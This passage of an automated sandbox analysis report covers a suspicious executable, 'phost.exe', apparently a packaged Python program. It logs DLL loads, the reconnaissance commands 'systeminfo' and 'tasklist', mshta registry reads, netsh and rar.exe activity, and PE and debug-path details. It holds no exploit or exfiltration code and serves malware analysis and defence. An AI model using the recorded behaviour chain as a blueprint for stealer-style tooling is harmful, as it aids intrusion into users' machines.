              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: C:\Windows\System32\mshta.exeAutomated click: OK
              Source: C:\Windows\System32\conhost.exeAutomated click: OK
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: phost.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: phost.exeStatic file information: File size 7832204 > 1048576
              Source: phost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: phost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: phost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: phost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: phost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: phost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: phost.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: phost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: phost.exe, 00000001.00000002.2186287138.00007FFE13301000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: phost.exe, 00000001.00000002.2183769002.00007FFDFB5E4000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.pdb source: powershell.exe, 0000004A.00000002.1977970654.000001C716F45000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: phost.exe, 00000001.00000002.2181473633.00007FFDFAA4F000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: phost.exe, 00000001.00000002.2185911655.00007FFE126D1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: phost.exe, 00000001.00000002.2186466073.00007FFE13337000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: phost.exe, 00000001.00000002.2182012279.00007FFDFAAE5000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: phost.exe, 00000001.00000002.2182736521.00007FFDFB052000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: phost.exe, 00000001.00000002.2185661990.00007FFE1151C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: phost.exe, phost.exe, 00000001.00000002.2182736521.00007FFDFB052000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: t.pdb source: powershell.exe, 0000004A.00000002.2038143526.000001C72DD50000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: phost.exe, 00000001.00000002.2186119387.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: phost.exe, 00000001.00000002.2185661990.00007FFE1151C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: phost.exe, 00000001.00000002.2185499865.00007FFE10301000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: phost.exe, 00000000.00000003.1675759091.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2187104659.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.pdbhP source: powershell.exe, 0000004A.00000002.1977970654.000001C716F45000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: phost.exe, 00000000.00000003.1675759091.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2187104659.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: phost.exe, phost.exe, 00000001.00000002.2182380751.00007FFDFAB31000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: phost.exe, 00000001.00000002.2184947186.00007FFE101D1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: phost.exe, 00000001.00000002.2185223962.00007FFE10241000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: phost.exe, phost.exe, 00000001.00000002.2182012279.00007FFDFAAE5000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000069.00000000.2046278309.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: phost.exe, 00000001.00000002.2184701934.00007FFE0EB31000.00000040.00000001.01000000.00000010.sdmp
              Source: phost.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
